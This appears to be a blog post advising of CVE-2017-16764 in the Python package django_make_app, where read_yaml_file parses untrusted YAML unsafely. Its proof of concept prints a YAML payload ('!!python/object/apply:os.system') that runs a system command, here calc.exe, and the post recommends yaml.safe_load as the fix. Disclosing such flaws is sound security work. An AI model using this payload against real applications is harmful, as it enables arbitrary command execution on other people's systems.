---
layout: post
title: "CVE-2017-16764: vulnerability in django_make_app"
date: 2017-11-12 22:20:12 +0800
comments: true
categories: vulnerability
---


<font size="4">**Python Package:**　　[django_make_app](https://pypi.python.org/pypi/django_make_app/)  </font>

<font size="4"> **Version:**　　　　　 Before 0.1.3  </font>

<font size="4"> **Published:**　　　　Nov. 10 th. 2017  </font>

<font size="4"> **Reported by:** 　　　　　 Joel  </font>

<font size="4"> **CVE-2017-16764** 　　　[CVE_details](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16764)</font>


## Overview 

`Django_make_app` is Define models and fields using YAML and generate app for Django with views, forms, templates etc.  An issue was discovered in the `django_make_app` package before `0.1.3`.Untrusted data passed into the `read_yaml_file` function can execute arbitrary python commands resulting in command execution.



## POC

```
from django_make_app.io_utils import read_yaml_file
yaml_raw_data = read_yaml_file('joel.yml')
#'joel.yml'：!!python/object/apply:os.system ["calc.exe"]

```
## Remediation

At present, manufacturers have not yet related repair patch. It should use `yaml.safe_load` to parse yaml file.

